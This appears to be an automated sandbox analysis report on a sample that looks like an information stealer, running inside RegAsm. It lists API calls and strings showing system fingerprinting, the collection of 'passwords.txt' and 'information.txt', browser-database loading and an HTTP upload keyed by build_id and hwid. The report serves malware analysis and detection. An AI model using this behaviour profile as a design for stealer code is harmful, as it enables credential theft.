Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

[Processes], xrefs: 0041442A
information.txt, xrefs: 00414573
GUID: , xrefs: 00413CE1
HWID: , xrefs: 00413D4E
Path: , xrefs: 00413DBB
RAM: , xrefs: 00414350
Date: , xrefs: 00413C1F
VideoCard: , xrefs: 004143B7
[Hardware], xrefs: 0041420D
Processor: , xrefs: 0041422D
Threads: , xrefs: 004142EF
Keyboard Languages: , xrefs: 004140DE
Windows: , xrefs: 00413E70
Display Resolution: , xrefs: 0041406F
Work Dir: In memory, xrefs: 00413E30
TimeZone: , xrefs: 004141AC
Install Date: , xrefs: 00413ED1
Cores: , xrefs: 0041428E
MachineID: , xrefs: 00413C80
[Software], xrefs: 004144A3
Version: , xrefs: 00413B9F
Local Time: , xrefs: 0041414B
AV: , xrefs: 00413F3E
Computer Name: , xrefs: 00413FAD
User Name: , xrefs: 0041400E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$AllocateCharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 3279995179-1014693891
Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
Sleep.KERNEL32(0000EA60), ref: 00416BFF

Strings

ERROR, xrefs: 00416B51
ERROR, xrefs: 00416AF1
ERROR, xrefs: 00416A98
ERROR, xrefs: 00416BAA
sqlite3.dll, xrefs: 00416C9C
sqlite3.dll, xrefs: 00416C68
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CDF
.vA, xrefs: 00416D1D
sqlp.dll, xrefs: 00416CFE
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CAE
sqlp.dll, xrefs: 00416CCD
ERROR, xrefs: 00416BC0
ERROR, xrefs: 00416BD6
ERROR, xrefs: 00416BE8

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-4129404369
Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,00436953,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

build_id, xrefs: 0040500D
------, xrefs: 00404DFB
------, xrefs: 00404C75
", xrefs: 00405039
", xrefs: 00404ED9
8wA, xrefs: 00405222
hwid, xrefs: 00404EAD
------, xrefs: 00404F5B

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$8wA$build_id$hwid
API String ID: 3006978581-858375883
Opcode ID: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction ID: 7219792e9a540e442724c4d24598c6325e7ae8fa207a63d5b21e459a2de286cb
Opcode Fuzzy Hash: 34a212d76a3bfc79e74cf83c5d1317f3bdb29bc58600130ec353d97f1a3d475c
Instruction Fuzzy Hash: C002C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00401666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00401696
wsprintfW.USER32 ref: 004016BC
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 004016E6
GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 004016FE
RtlAllocateHeap.NTDLL(00000000), ref: 00401705
_time64.MSVCRT ref: 0040170E
srand.MSVCRT ref: 00401715
rand.MSVCRT ref: 0040171E
_memset.LIBCMT ref: 0040172E
WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00401746
_memset.LIBCMT ref: 00401763
CloseHandle.KERNEL32(?), ref: 00401771
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0040178D
ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 004017A9
_memset.LIBCMT ref: 004017BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004017C8
RtlFreeHeap.NTDLL(00000000), ref: 004017CF
CloseHandle.KERNEL32(?), ref: 004017DB

Strings

%s%s, xrefs: 004016B6
delays.tmp, xrefs: 004016A4

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

